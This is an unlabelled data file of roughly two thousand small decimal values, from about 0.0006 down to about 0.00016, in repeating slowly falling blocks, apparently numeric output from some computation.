0.000565841
0.000578646
0.000576627
0.00056785
0.000565778
0.000576631
0.000578707
0.000565838
0.000578749
0.000565728
0.000578761
0.000565739
0.000578751
0.000565726
0.000578762
0.000565741
0.000596338
0.000583282
0.000596331
0.000583283
0.000578195
0.000565721
0.000565723
0.000578764
0.000578764
0.000565719
0.000578768
0.00056572
0.000578769
0.000561209
0.00054816
0.000561206
0.000548161
0.000561208
0.000561204
0.00054871
0.000548163
0.000548164
0.000530595
0.000543645
0.000530594
0.000543647
0.000543071
0.000530597
0.000530598
0.000543641
0.000543645
0.000548171
0.000561203
0.00056119
0.000548165
0.000548278
0.000561152
0.000559066
0.000550279
0.000561089
0.000548218
0.000550283
0.000548278
0.000561149
0.000559068
0.000550281
0.000561088
0.000548219
0.000550284
0.000543631
0.0005306
0.000543639
0.000530609
0.000543629
0.000530598
0.000543639
0.00053061
0.000543526
0.000541501
0.000530651
0.000532721
0.000543585
0.000541502
0.000530713
0.000543525
0.000541499
0.000530651
0.00053272
0.000543586
0.000541502
0.000530714
0.000561205
0.000561206
0.000548707
0.000548164
0.000548164
0.00056121
0.000548159
0.000530594
0.000543645
0.000543069
0.000530597
0.000530593
0.000543642
0.000543643
0.000530587
0.000543646
0.000548273
0.000561147
0.00055907
0.000550281
0.000561088
0.000548218
0.000550288
0.000548169
0.0005612
0.000561194
0.000548161
0.000548274
0.00055907
0.000561146
0.000550282
0.000561088
0.000550289
0.000548215
0.000543627
0.0005306
0.000543641
0.000530608
0.000543524
0.0005415
0.000530652
0.000532721
0.000543585
0.000541505
0.000530712
0.000543626
0.000530598
0.000543636
0.00053061
0.000543523
0.000541501
0.000532721
0.000530652
0.000541507
0.000543582
0.000530713
0.000548168
0.000561206
0.000561192
0.000548163
0.000548269
0.000559066
0.000561144
0.000550276
0.000561086
0.000550285
0.00054821
0.000548168
0.000561199
0.00056119
0.000548157
0.000543518
0.000541498
0.000530649
0.00053272
0.000543583
0.000541502
0.000530712
0.000543625
0.000530595
0.000543641
0.000530608
0.000543518
0.000541496
0.000532718
0.000530647
0.000541503
0.000543578
0.000530709
0.000543624
0.000530597
0.000543631
0.000530608
0.000561204
0.000561207
0.00054871
0.000548161
0.000548158
0.000561209
0.000548155
0.000530594
0.000543642
0.000543071
0.0005306
0.000530598
0.000543639
0.000543637
0.000530593
0.000543643
0.000548272
0.000559068
0.000561146
0.000550278
0.000561086
0.000550285
0.000548216
0.000548169
0.000561204
0.000561192
0.00054816
0.000548168
0.000561202
0.000561192
0.000548163
0.000543518
0.000541498
0.000532721
0.000530652
0.000541504
0.00054358
0.000530713
0.000543521
0.000541495
0.000532717
0.000530649
0.000541501
0.000543583
0.00053071
0.000543625
0.000530597
0.000543635
0.000530608
0.000543625
0.000530597
0.000543638
0.000530609
0.000561204
0.000548153
0.000561207
0.000548157
0.000543067
0.000530593
0.000530595
0.000543635
0.000543636
0.00053059
0.000543638
0.000530592
0.000543641
0.000526079
0.000513025
0.000526078
0.000513026
0.000526076
0.000526075
0.000513583
0.000513027
0.00051303
0.000495453
0.00050851
0.000495456
0.00050851
0.000507939
0.000495457
0.000495459
0.000508507
0.000508507
0.000513041
0.00052607
0.000526061
0.000513029
0.000513141
0.000526018
0.000523939
0.000515151
0.000525959
0.000513083
0.000515155
0.00051314
0.000526017
0.000523939
0.000515148
0.000525959
0.000513083
0.000515154
0.000508496
0.00049546
0.000508504
0.00049547
0.000508497
0.000495459
0.000508502
0.000495469
0.000508388
0.000506365
0.000495512
0.000497585
0.00050845
0.00050637
0.000495574
0.000508389
0.000506365
0.000495512
0.000497582
0.000508448
0.000506369
0.000495575
0.000526073
0.000526068
0.000513577
0.000513027
0.000513024
0.000526071
0.00051302
0.000495454
0.000508507
0.000507936
0.000495458
0.000495455
0.000508504
0.000508501
0.000495451
0.000508505
0.000513143
0.000526018
0.000523938
0.000515148
0.000525958
0.000513084
0.000515154
0.000513039
0.000526073
0.000526065
0.000513031
0.000513143
0.000523938
0.000526018
0.000515147
0.000525959
0.000515155
0.000513083
0.000508493
0.00049546
0.000508505
0.000495469
0.00050839
0.000506364
0.000495513
0.000497585
0.00050845
0.00050637
0.000495572
0.000508494
0.00049546
0.000508504
0.000495469
0.000508389
0.000506365
0.000497586
0.000495514
0.000506372
0.000508448
0.000495573
0.000513038
0.000526067
0.000526063
0.000513027
0.000513137
0.000523932
0.000526015
0.000515146
0.000525957
0.000515147
0.00051308
0.000513037
0.00052607
0.000526063
0.000513027
0.000508383
0.00050636
0.000495509
0.00049758
0.000508448
0.000506362
0.000495571
0.000508491
0.000495456
0.0005085
0.00049547
0.000508384
0.000506363
0.000497583
0.000495509
0.000506365
0.000508446
0.00049557
0.000508492
0.000495455
0.000508501
0.000495466
0.000526077
0.000526076
0.000513573
0.00051303
0.000513027
0.000526078
0.000513023
0.000495454
0.000508511
0.000507934
0.000495459
0.000495461
0.000508507
0.000508506
0.000495457
0.000508508
0.000513137
0.000523937
0.000526015
0.000515149
0.000525956
0.000515155
0.000513078
0.000513036
0.000526072
0.000526061
0.000513027
0.000513034
0.000526071
0.00052606
0.000513025
0.000508384
0.000506364
0.000497586
0.000495516
0.00050637
0.000508448
0.000495578
0.000508384
0.000506366
0.000497587
0.000495512
0.000506372
0.000508445
0.000495577
0.000508491
0.000495464
0.000508502
0.000495474
0.00050849
0.000495461
0.000508498
0.000495471
0.000526075
0.00051302
0.000526077
0.00051302
0.000507935
0.000495454
0.000495459
0.0005085
0.000508501
0.00049545
0.000508505
0.000495456
0.000508504
0.000490938
0.000477883
0.000490938
0.000477883
0.000490934
0.000490935
0.000478438
0.000477888
0.000477888
0.000460312
0.000473367
0.000460311
0.000473368
0.000472795
0.000460317
0.000460314
0.000473364
0.000473365
0.000477901
0.000490933
0.000490923
0.00047789
0.000477998
0.000490877
0.000488798
0.000480008
0.000490817
0.000477941
0.000480013
0.000477998
0.000490878
0.000488796
0.000480007
0.000490818
0.000477942
0.000480011
0.000473353
0.000460317
0.000473362
0.000460328
0.000473354
0.000460319
0.000473363
0.000460329
0.000473245
0.000471224
0.00046037
0.000462443
0.000473306
0.000471229
0.000460431
0.000473244
0.000471223
0.00046037
0.000462442
0.000473306
0.000471228
0.000460429
0.000490934
0.000490931
0.000478438
0.000477887
0.000477884
0.000490934
0.00047788
0.000460313
0.000473368
0.000472796
0.000460317
0.000460318
0.000473364
0.00047336
0.000460312
0.000473364
0.000477999
0.000490878
0.0004888
0.000480009
0.000490817
0.000477941
0.000480013
0.000477902
0.000490934
0.000490925
0.000477892
0.000478
0.000488801
0.000490878
0.000480008
0.000490817
0.000480012
0.000477947
0.000473353
0.000460317
0.000473362
0.000460327
0.000473247
0.000471225
0.00046037
0.000462442
0.000473306
0.000471228
0.000460431
0.000473354
0.000460317
0.000473366
0.000460327
0.000473249
0.000471222
0.00046244
0.000460372
0.000471224
0.000473312
0.000460431
0.000477893
0.000490928
0.00049092
0.000477886
0.000477996
0.000488801
0.000490875
0.000480009
0.000490815
0.000480015
0.000477939
0.000477895
0.000490928
0.00049092
0.000477886
0.000473243
0.000471226
0.000460372
0.000462446
0.000473303
0.000471232
0.000460432
0.000473345
0.000460318
0.000473358
0.000460326
0.000473245
0.000471226
0.000462446
0.000460372
0.000471231
0.000473305
0.000460431
0.000473347
0.000460318
0.000473362
0.000460327
0.000490935
0.000490937
0.00047844
0.000477892
0.000477888
0.000490941
0.000477886
0.000460311
0.000473371
0.000472799
0.000460315
0.000460317
0.000473368
0.000473366
0.000460314
0.00047337
0.000478003
0.000488803
0.000490879
0.00048001
0.000490821
0.000480018
0.000477942
0.000477899
0.000490937
0.000490927
0.000477892
0.000477897
0.000490934
0.000490926
0.000477889
0.000473248
0.000471224
0.000462446
0.000460374
0.000471232
0.000473311
0.000460438
0.000473249
0.000471226
0.000462445
0.000460375
0.000471233
0.000473307
0.000460437
0.000473352
0.000460321
0.000473365
0.000460336
0.000473352
0.000460324
0.000473362
0.000460337
0.000490934
0.000477881
0.00049094
0.000477885
0.000472799
0.000460319
0.000460321
0.000473363
0.000473365
0.000460314
0.000473367
0.000460319
0.000473369
0.000455795
0.000442743
0.000455795
0.000442741
0.000455792
0.000455792
0.000443297
0.000442746
0.000442746
0.000425172
0.000438228
0.000425173
0.000438227
0.000437654
0.000425177
0.000425177
0.000438224
0.000438225
0.000442756
0.000455792
0.000455782
0.000442748
0.000442858
0.000455736
0.000453657
0.000444866
0.000455676
0.000442803
0.000444869
0.000442856
0.000455735
0.000453656
0.000444863
0.000455673
0.0004428
0.00044487
0.000438213
0.000425177
0.000438223
0.000425188
0.000438211
0.000425176
0.000438221
0.000425188
0.000438106
0.00043608
0.000425231
0.000427295
0.000438169
0.000436082
0.000425292
0.000438103
0.000436081
0.00042523
0.000427298
0.000438165
0.000436085
0.000425293
0.000455793
0.000455794
0.000443292
0.000442747
0.000442748
0.000455797
0.000442743
0.000425171
0.000438227
0.00043765
0.000425176
0.000425177
0.000438223
0.000438222
0.000425174
0.000438226
0.000442858
0.000455735
0.000453659
0.000444869
0.000455676
0.0004428
0.000444874
0.000442755
0.00045579
0.00045578
0.00044275
0.000442856
0.000453657
0.000455736
0.000444869
0.000455675
0.000444873
0.000442802
0.00043821
0.000425179
0.000438223
0.000425187
0.000438106
0.000436083
0.000425233
0.000427299
0.000438167
0.000436088
0.000425294
0.00043821
0.000425178
0.000438223
0.000425189
0.000438104
0.000436087
0.000427302
0.000425231
0.000436088
0.000438167
0.000425294
0.000442759
0.00045579
0.000455781
0.000442747
0.000442862
0.000453659
0.000455738
0.000444868
0.000455676
0.000444871
0.000442801
0.000442759
0.000455792
0.000455782
0.000442749
0.000438103
0.000436081
0.000425233
0.000427303
0.000438164
0.00043609
0.000425293
0.000438212
0.00042518
0.000438219
0.000425189
0.000438107
0.000436083
0.000427302
0.000425231
0.000436086
0.000438168
0.000425289
0.000438212
0.000425179
0.000438223
0.000425191
0.000455791
0.000455795
0.000443295
0.000442749
0.00044275
0.000455799
0.000442745
0.000425172
0.000438228
0.000437654
0.000425175
0.000425177
0.000438225
0.000438227
0.000425174
0.000438228
0.00044286
0.000453658
0.000455743
0.000444867
0.000455682
0.000444872
0.000442803
0.000442757
0.000455795
0.000455789
0.000442749
0.000442755
0.000455797
0.000455789
0.000442749
0.000438105
0.000436085
0.000427306
0.000425232
0.000436092
0.000438167
0.000425295
0.000438106
0.000436084
0.000427304
0.000425231
0.000436089
0.000438168
0.000425292
0.000438207
0.00042518
0.000438221
0.000425188
0.000438209
0.000425179
0.000438223
0.00042519
0.000455799
0.000442743
0.000455802
0.000442744
0.000437654
0.000425177
0.000425177
0.000438225
0.000438225
0.000425174
0.000438227
0.000425173
0.000438228
0.000420656
0.0004076
0.000420658
0.000407602
0.000420654
0.000420655
0.000408154
0.000407604
0.000407606
0.00039003
0.000403085
0.000390032
0.000403087
0.000402511
0.000390034
0.000390037
0.000403082
0.000403084
0.000407615
0.000420649
0.000420641
0.000407607
0.000407718
0.000420597
0.000418515
0.000409727
0.000420535
0.000407659
0.000409734
0.000407717
0.000420595
0.000418516
0.000409724
0.000420536
0.000407661
0.000409732
0.000403068
0.000390034
0.000403079
0.000390048
0.000403067
0.000390035
0.000403082
0.000390043
0.000402965
0.000400944
0.000390088
0.000392164
0.000403025
0.000400951
0.00039015
0.000402963
0.000400941
0.000390088
0.000392164
0.000403026
0.000400949
0.000390152
0.000420652
0.000420653
0.000408155
0.000407605
0.000407606
0.000420657
0.000407601
0.000390031
0.000403086
0.000402512
0.000390035
0.000390035
0.000403083
0.00040308
0.000390031
0.000403084
0.000407721
0.000420599
0.000418515
0.000409724
0.000420537
0.000407662
0.000409729
0.000407619
0.000420651
0.000420642
0.000407607
0.000407722
0.000418518
0.000420596
0.00040973
0.000420539
0.000409732
0.000407661
0.000403078
0.000390037
0.000403082
0.000390046
0.000402967
0.000400943
0.00039009
0.000392161
0.000403027
0.000400946
0.000390152
0.000403075
0.000390037
0.000403081
0.000390046
0.000402968
0.000400945
0.00039216
0.000390093
0.000400947
0.000403026
0.000390153
0.000407614
0.000420652
0.000420645
0.000407607
0.000407716
0.000418517
0.000420597
0.000409725
0.000420533
0.000409728
0.000407661
0.000407615
0.000420653
0.000420645
0.000407608
0.000402962
0.000400942
0.000390091
0.00039216
0.000403024
0.000400946
0.000390156
0.000403069
0.000390036
0.000403079
0.000390047
0.000402963
0.000400942
0.000392159
0.00039009
0.000400944
0.000403027
0.000390153
0.00040307
0.000390038
0.000403081
0.000390045
0.000420653
0.000420654
0.000408159
0.000407607
0.000407605
0.000420657
0.000407601
0.000390032
0.000403086
0.000402517
0.000390037
0.000390035
0.000403083
0.000403082
0.000390032
0.000403085
0.000407717
0.000418522
0.000420596
0.000409728
0.000420537
0.000409737
0.000407657
0.000407615
0.000420652
0.000420642
0.000407606
0.000407612
0.00042065
0.00042064
0.000407603
0.000402962
0.000400948
0.000392166
0.00039009
0.000400952
0.000403024
0.000390153
0.000402964
0.000400946
0.000392167
0.00039009
0.000400953
0.000403023
0.000390152
0.000403067
0.000390036
0.000403081
0.000390049
0.000403065
0.000390036
0.000403079
0.000390048
0.000420658
0.000407601
0.000420655
0.000407599
0.000402515
0.000390037
0.000390035
0.000403081
0.000403081
0.000390033
0.000403085
0.000390031
0.000403085
0.000385514
0.000372461
0.000385514
0.000372459
0.000385512
0.000385513
0.000373016
0.000372464
0.000372464
0.000354892
0.000367945
0.000354891
0.000367944
0.000367374
0.000354896
0.000354895
0.000367942
0.00036794
0.000372475
0.000385509
0.000385498
0.000372464
0.000372576
0.000385454
0.000383379
0.000374586
0.000385394
0.000372517
0.000374593
0.000372576
0.000385453
0.000383379
0.000374587
0.000385395
0.000372519
0.000374592
0.000367926
0.000354897
0.000367939
0.000354906
0.000367929
0.000354897
0.000367937
0.000354907
0.000367823
0.000365804
0.00035495
0.000357024
0.000367883
0.00036581
0.000355012
0.000367823
0.000365806
0.00035495
0.000357022
0.000367885
0.000365809
0.000355013
0.000385512
0.000385511
0.000373017
0.000372464
0.000372467
0.000385515
0.000372463
0.000354892
0.000367942
0.000367372
0.000354897
0.000354896
0.00036794
0.000367944
0.000354893
0.000367948
0.000372579
0.000385456
0.000383377
0.000374586
0.000385394
0.000372518
0.00037459
0.000372478
0.000385512
0.000385503
0.000372471
0.000372578
0.000383375
0.000385458
0.000374583
0.000385395
0.00037459
0.000372523
0.000367932
0.000354896
0.000367938
0.000354906
0.000367829
0.000365803
0.000354949
0.000357023
0.000367884
0.000365807
0.000355011
0.000367933
0.0003549
0.000367942
0.000354908
0.000367826
0.000365802
0.000357025
0.000354952
0.000365808
0.000367888
0.000355012
0.000372479
0.000385509
0.000385499
0.000372467
0.000372577
0.000383377
0.000385456
0.000374586
0.000385397
0.000374594
0.000372524
0.00037248
0.000385511
0.000385501
0.00037247
0.000367822
0.000365803
0.000354952
0.000357026
0.000367883
0.000365813
0.000355016
0.000367932
0.000354899
0.000367941
0.000354911
0.000367825
0.000365804
0.000357026
0.000354952
0.000365812
0.000367889
0.000355014
0.000367932
0.000354901
0.000367944
0.00035491
0.000385513
0.000385512
0.000373014
0.000372469
0.000372465
0.000385515
0.000372461
0.000354894
0.000367948
0.000367373
0.0003549
0.000354901
0.000367945
0.000367943
0.000354896
0.000367946
0.000372578
0.000383382
0.000385456
0.000374589
0.000385397
0.000374595
0.000372522
0.000372475
0.000385509
0.000385502
0.000372465
0.000372479
0.00038551
0.000385501
0.000372468
0.000367826
0.000365809
0.000357026
0.000354955
0.000365811
0.000367886
0.000355018
0.000367825
0.000365805
0.000357026
0.000354955
0.00036581
0.000367889
0.000355017
0.000367931
0.000354901
0.00036794
0.000354912
0.000367933
0.000354901
0.000367943
0.00035491
0.000385518
0.000372464
0.000385515
0.000372463
0.000367376
0.000354899
0.0003549
0.000367944
0.000367945
0.000354895
0.000367948
0.000354896
0.000367948
0.000350375
0.000337326
0.000350375
0.000337325
0.000350373
0.000350373
0.000337876
0.000337331
0.00033733
0.000319759
0.000332811
0.000319757
0.000332809
0.000332235
0.000319763
0.00031976
0.000332808
0.000332806
0.000337342
0.000350371
0.000350362
0.000337334
0.000337441
0.000350316
0.000348241
0.000339449
0.000350256
0.000337384
0.000339456
0.000337441
0.000350315
0.000348239
0.000339449
0.000350256
0.000337386
0.000339454
0.000332795
0.000319765
0.000332806
0.000319775
0.000332796
0.000319764
0.000332808
0.000319773
0.000332687
0.000330668
0.000319816
0.000321885
0.00033275
0.000330672
0.000319877
0.000332689
0.000330666
0.000319817
0.000321887
0.000332752
0.000330671
0.000319877
0.000350373
0.000350372
0.00033788
0.000337332
0.000337329
0.000350376
0.000337324
0.000319759
0.000332814
0.000332235
0.000319763
0.000319764
0.000332809
0.000332807
0.00031976
0.00033281
0.00033744
0.000350315
0.000348242
0.00033945
0.000350255
0.000337383
0.000339456
0.000337338
0.000350371
0.000350362
0.000337331
0.00033744
0.000348242
0.000350317
0.000339452
0.000350256
0.000339455
0.000337384
0.000332789
0.000319762
0.000332803
0.000319773
0.000332687
0.000330669
0.000319818
0.000321886
0.000332749
0.000330674
0.000319876
0.000332791
0.000319764
0.000332805
0.000319769
0.000332687
0.00033067
0.000321889
0.000319816
0.000330674
0.000332748
0.000319876
0.000337337
0.000350372
0.000350365
0.00033733
0.00033744
0.000348242
0.000350318
0.000339451
0.000350259
0.000339457
0.000337382
0.000337337
0.000350373
0.000350362
0.000337329
0.000332687
0.00033067
0.000319818
0.000321891
0.000332749
0.000330674
0.00031988
0.000332792
0.000319765
0.000332804
0.000319776
0.000332688
0.000330671
0.00032189
0.000319817
0.000330675
0.000332747
0.000319879
0.000332792
0.000319764
0.000332802
0.000319775
0.000350375
0.000350377
0.000337882
0.00033733
0.000337332
0.00035038
0.000337326
0.000319757
0.000332811
0.000332241
0.000319761
0.000319762
0.000332807
0.000332807
0.000319758
0.000332811
0.000337442
0.000348243
0.000350319
0.000339451
0.000350261
0.000339457
0.000337385
0.000337341
0.000350374
0.000350364
0.000337332
0.000337341
0.000350373
0.000350364
0.000337332
0.000332688
0.000330668
0.000321891
0.000319817
0.000330675
0.000332751
0.000319883
0.000332689
0.00033067
0.00032189
0.000319819
0.000330673
0.00033275
0.00031988
0.000332794
0.000319764
0.000332806
0.000319774
0.000332796
0.000319768
0.000332806
0.000319776
0.000350378
0.000337324
0.00035038
0.000337326
0.000332242
0.000319764
0.000319766
0.000332806
0.000332808
0.00031976
0.000332809
0.000319762
0.000332811
0.000315242
0.000302191
0.000315241
0.000302189
0.000315238
0.000315238
0.000302742
0.000302195
0.000302193
0.000284627
0.000297676
0.000284626
0.000297675
0.000297101
0.00028463
0.00028463
0.000297672
0.000297669
0.000302203
0.000315235
0.000315225
0.000302196
0.000302307
0.000315182
0.000313104
0.000304315
0.000315119
0.000302248
0.00030432
0.000302307
0.000315181
0.000313108
0.000304317
0.000315122
0.00030225
0.000304323
0.000297657
0.00028463
0.000297671
0.00028464
0.000297658
0.000284632
0.000297671
0.000284641
0.000297553
0.000295536
0.000284683
0.000286757
0.000297613
0.000295541
0.000284746
0.000297553
0.000295538
0.000284685
0.000286755
0.000297615
0.000295542
0.000284745
0.000315238
0.000315239
0.000302748
0.000302195
0.000302199
0.000315244
0.000302195
0.000284626
0.000297675
0.000297103
0.000284631
0.000284635
0.000297673
0.000297676
0.00028463
0.00029768
0.000302304
0.000315182
0.000313105
0.000304315
0.000315119
0.000302247
0.000304321
0.000302206
0.000315235
0.000315226
0.000302195
0.000302306
0.000313107
0.000315179
0.000304318
0.00031512
0.000304322
0.000302249
0.000297659
0.000284632
0.000297671
0.000284644
0.000297552
0.000295536
0.000284685
0.000286756
0.000297612
0.000295541
0.000284743
0.000297661
0.000284629
0.000297669
0.000284639
0.000297553
0.000295538
0.000286757
0.000284683
0.000295541
0.000297613
0.000284744
0.000302211
0.000315238
0.000315228
0.000302202
0.000302312
0.000313108
0.000315182
0.000304319
0.000315125
0.000304322
0.000302252
0.000302208
0.000315238
0.000315227
0.000302198
0.000297552
0.000295535
0.00028469
0.000286758
0.00029762
0.000295542
0.00028475
0.000297664
0.000284637
0.000297676
0.000284647
0.000297552
0.000295541
0.00028676
0.000284687
0.000295544
0.000297617
0.000284747
0.00029766
0.000284634
0.000297673
0.000284647
0.000315234
0.000315238
0.000302746
0.000302194
0.000302194
0.00031524
0.000302189
0.000284623
0.000297674
0.000297104
0.000284629
0.000284634
0.000297669
0.000297672
0.000284632
0.000297677
0.000302308
0.000313109
0.000315184
0.000304318
0.000315124
0.000304324
0.000302251
0.000302209
0.000315236
0.000315228
0.000302195
0.000302207
0.000315241
0.00031523
0.000302199
0.000297556
0.000295538
0.000286753
0.000284689
0.000295539
0.000297617
0.000284751
0.000297557
0.000295539
0.000286756
0.000284689
0.000295541
0.000297616
0.00028475
0.000297665
0.000284639
0.000297672
0.000284648
0.000297663
0.000284635
0.000297674
0.00028465
0.000315243
0.000302193
0.000315246
0.000302193
0.000297107
0.000284633
0.000284633
0.000297675
0.000297674
0.00028463
0.000297679
0.000284629
0.000297679
0.000280113
0.000267064
0.000280111
0.000267059
0.000280107
0.000280107
0.000267616
0.000267068
0.000267065
0.000249502
0.000262549
0.000249499
0.000262546
0.000261973
0.000249507
0.000249505
0.000262546
0.000262542
0.000267081
0.000280104
0.000280095
0.000267069
0.000267182
0.000280048
0.000277977
0.000269184
0.00027999
0.000267123
0.00026919
0.000267179
0.00028005
0.000277976
0.000269187
0.00027999
0.000267123
0.000269191
0.000262536
0.000249509
0.000262543
0.00024952
0.000262535
0.000249509
0.000262543
0.000249518
0.00026243
0.000260408
0.000249564
0.000251628
0.000262488
0.00026041
0.000249624
0.000262427
0.000260411
0.000249563
0.00025163
0.000262487
0.000260413
0.000249627
0.000280107
0.000280108
0.000267616
0.000267069
0.000267067
0.000280112
0.000267062
0.000249503
0.00026255
0.000261973
0.000249509
0.000249507
0.000262547
0.000262544
0.000249502
0.000262549
0.000267178
0.000280049
0.000277976
0.000269183
0.000279989
0.000267119
0.000269191
0.000267075
0.000280103
0.000280094
0.000267064
0.000267176
0.000277975
0.000280047
0.000269186
0.00027999
0.000269191
0.000267119
0.000262529
0.000249504
0.000262539
0.000249514
0.000262424
0.000260407
0.000249557
0.000251628
0.000262484
0.000260412
0.000249618
0.00026253
0.000249501
0.000262538
0.000249513
0.000262423
0.000260408
0.000251628
0.000249556
0.000260411
0.000262482
0.000249618
0.000267077
0.000280107
0.000280099
0.000267069
0.000267177
0.00027798
0.000280051
0.000269188
0.000279991
0.000269194
0.000267121
0.000267079
0.000280109
0.000280101
0.00026707
0.000262424
0.00026041
0.000249562
0.000251629
0.000262487
0.000260415
0.000249626
0.000262531
0.000249508
0.000262542
0.000249519
0.000262425
0.000260412
0.000251631
0.000249561
0.000260415
0.000262485
0.000249624
0.000262533
0.000249505
0.000262543
0.000249517
0.000280104
0.00028011
0.000267615
0.000267063
0.000267066
0.000280117
0.00026706
0.000249495
0.000262544
0.000261973
0.0002495
0.000249499
0.000262539
0.000262541
0.000249494
0.000262545
0.000267179
0.000277976
0.000280055
0.000269183
0.000279993
0.000269192
0.000267123
0.000267076
0.000280112
0.000280101
0.000267065
0.000267075
0.000280107
0.000280102
0.000267068
0.000262425
0.000260408
0.000251629
0.000249556
0.000260414
0.000262483
0.000249623
0.000262427
0.000260408
0.000251631
0.000249558
0.000260414
0.000262486
0.00024962
0.00026253
0.0002495
0.000262538
0.000249515
0.000262528
0.000249506
0.000262541
0.000249517
0.000280115
0.000267064
0.000280114
0.000267062
0.000261975
0.000249504
0.000249504
0.000262545
0.000262544
0.000249498
0.000262549
0.000249499
0.000262547
0.000244987
0.000231938
0.000244985
0.000231934
0.000244983
0.00024498
0.000232494
0.000231943
0.000231939
0.000214373
0.000227423
0.00021437
0.00022742
0.000226848
0.000214379
0.000214376
0.000227418
0.000227415
0.000231954
0.000244984
0.00024497
0.000231946
0.000232059
0.000244928
0.000242851
0.000234059
0.000244869
0.000231998
0.000234068
0.000232058
0.000244927
0.00024285
0.000234059
0.000244872
0.000232001
0.000234066
0.000227409
0.000214379
0.000227417
0.000214394
0.000227409
0.000214381
0.000227419
0.000214393
0.000227304
0.000225286
0.000214435
0.000216508
0.000227361
0.000225291
0.000214496
0.000227302
0.000225285
0.000214436
0.000216505
0.000227362
0.000225289
0.000214497
0.000244985
0.000244981
0.000232492
0.000231945
0.000231946
0.000244987
0.000231939
0.000214375
0.000227425
0.000226845
0.000214382
0.00021438
0.000227419
0.00022742
0.000214373
0.000227425
0.000232054
0.000244921
0.000242849
0.000234062
0.000244862
0.000231995
0.000234065
0.000231951
0.000244975
0.000244968
0.000231942
0.000232054
0.000242848
0.000244921
0.000234056
0.000244863
0.000234062
0.000231996
0.000227407
0.000214376
0.000227413
0.000214388
0.0002273
0.000225287
0.000214433
0.000216503
0.000227357
0.000225288
0.000214497
0.000227404
0.000214377
0.000227413
0.000214387
0.000227301
0.00022528
0.000216495
0.000214432
0.000225282
0.000227356
0.000214499
0.000231954
0.000244981
0.000244971
0.000231943
0.000232058
0.000242849
0.000244925
0.000234059
0.00024487
0.000234062
0.000231999
0.000231954
0.000244979
0.000244972
0.000231945
0.000227303
0.000225285
0.000214436
0.000216507
0.00022736
0.000225289
0.000214502
0.000227408
0.000214381
0.000227416
0.000214393
0.000227304
0.000225284
0.000216505
0.000214436
0.000225285
0.000227362
0.000214498
0.000227411
0.00021438
0.000227418
0.000214391
0.000244975
0.000244976
0.00023249
0.000231941
0.000231936
0.00024498
0.00023193
0.000214371
0.00022742
0.000226845
0.000214378
0.000214376
0.000227414
0.000227413
0.000214371
0.000227418
0.000232052
0.000242852
0.000244921
0.000234061
0.000244864
0.000234067
0.000231993
0.000231942
0.000244973
0.000244966
0.000231937
0.000231944
0.000244977
0.000244969
0.000231938
0.000227296
0.000225283
0.000216498
0.000214434
0.000225286
0.000227355
0.000214498
0.000227301
0.000225285
0.000216496
0.000214434
0.000225286
0.000227356
0.000214499
0.0002274
0.00021438
0.000227411
0.000214393
0.000227399
0.000214379
0.000227412
0.000214395
0.000244984
0.000231937
0.000244984
0.000231932
0.000226848
0.00021438
0.000214377
0.000227416
0.000227413
0.000214373
0.000227422
0.000214371
0.000227418
0.000209858
0.000196804
0.000209856
0.000196807
0.000209853
0.00020985
0.000197364
0.000196811
0.000196814
0.000179233
0.000192289
0.000179234
0.000192292
0.000191711
0.000179242
0.000179243
0.000192282
0.000192285
0.000196825
0.000209853
0.000209845
0.000196816
0.000196929
0.000209794
0.000207727
0.000198933
0.000209738
0.000196867
0.000198938
0.00019693
0.000209796
0.000207726
0.000198931
0.000209738
0.000196873
0.000198938
0.000192277
0.000179243
0.00019228
0.000179258
0.000192277
0.000179246
0.000192284
0.00017926
0.000192173
0.000190157
0.000179298
0.00018137
0.000192224
0.000190157
0.000179364
0.000192173
0.000190155
0.000179302
0.000181371
0.00019223
0.000190158
0.000179367
0.000209856
0.000209852
0.000197367
0.000196814
0.000196816
0.000209858
0.000196808
0.000179237
0.000192292
0.000191714
0.000179247
0.000179252
0.000192285
0.000192288
0.000179242
0.000192295
0.000196927
0.000209794
0.000207723
0.000198929
0.000209737
0.000196871
0.000198935
0.00019682
0.000209846
0.000209842
0.000196809
0.000196926
0.000207719
0.00020979
0.00019893
0.000209737
0.000198935
0.000196865
0.000192276
0.000179242
0.000192284
0.000179251
0.000192172
0.000190152
0.000179298
0.000181365
0.000192228
0.000190155
0.000179361
0.000192273
0.000179244
0.000192279
0.000179256
0.000192169
0.000190153
0.000181366
0.000179299
0.000190156
0.000192222
0.000179359
0.000196826
0.00020985
0.000209845
0.000196816
0.000196928
0.000207726
0.000209796
0.00019893
0.000209741
0.000198937
0.000196869
0.000196825
0.000209851
0.000209845
0.000196814
0.000192171
0.000190156
0.000179307
0.000181372
0.00019223
0.000190161
0.00017937
0.000192275
0.00017925
0.000192286
0.000179261
0.000192171
0.000190156
0.000181373
0.000179301
0.00019016
0.000192226
0.000179366
0.000192277
0.000179247
0.000192284
0.000179258
0.000209848
0.00020985
0.000197365
0.000196809
0.00019681
0.000209856
0.000196802
0.000179234
0.000192287
0.000191712
0.000179244
0.000179242
0.000192279
0.000192283
0.000179234
0.000192288
0.000196922
0.000207717
0.000209793
0.000198932
0.000209742
0.000198934
0.000196864
0.000196819
0.000209849
0.000209845
0.000196809
0.000196822
0.000209849
0.000209846
0.000196809
0.000192166
0.00019015
0.000181369
0.000179297
0.000190155
0.000192222
0.000179362
0.000192166
0.000190157
0.000181371
0.000179297
0.000190157
0.000192222
0.00017936
0.000192269
0.000179245
0.000192278
0.000179252
0.000192271
0.000179241
0.000192278
0.000179249
0.000209858
0.000196806
0.000209856
0.000196801
0.000191714
0.000179247
0.000179244
0.000192284
0.000192281
0.000179238
0.000192292
0.000179233
0.000192287
0.00017472
0.000161661
0.00017472
0.00016166
0.00017471
0.000174712
0.000162226
0.000161671
0.00016167
0.000144086
0.000157148
0.000144085
0.000157148
0.000156561
0.0001441
0.000144097
0.000157136
0.000157138
0.000161688
0.000174714
0.000174713
0.000161676
0.000161795
0.000174653
0.000172587
0.00016379
0.000174603
0.00016173
0.000163794
0.00016179
0.000174657
0.000172587
0.000163792
0.000174606
0.000161732
0.000163794
0.000157135
0.000144099
0.000157136
0.000144108
0.000157135
0.000144102
0.00015714
0.000144107
0.000157031
0.000155016
0.000144156
0.000146222
0.000157078
0.000155015
0.000144224
0.00015703
0.000155018
0.000144159
0.000146225
0.000157081
0.000155019
0.000144224
0.000174715
0.000174719
0.000162232
0.000161675
0.000161676
0.000174727
0.000161665
0.000144088
0.000157152
0.000156565
0.000144104
0.000144105
0.000157141
0.000157141
0.000144091
0.000157153
0.000161791
0.000174651
0.000172586
0.00016379
0.000174601
0.000161727
0.000163794
0.000161678
0.000174709
0.000174706
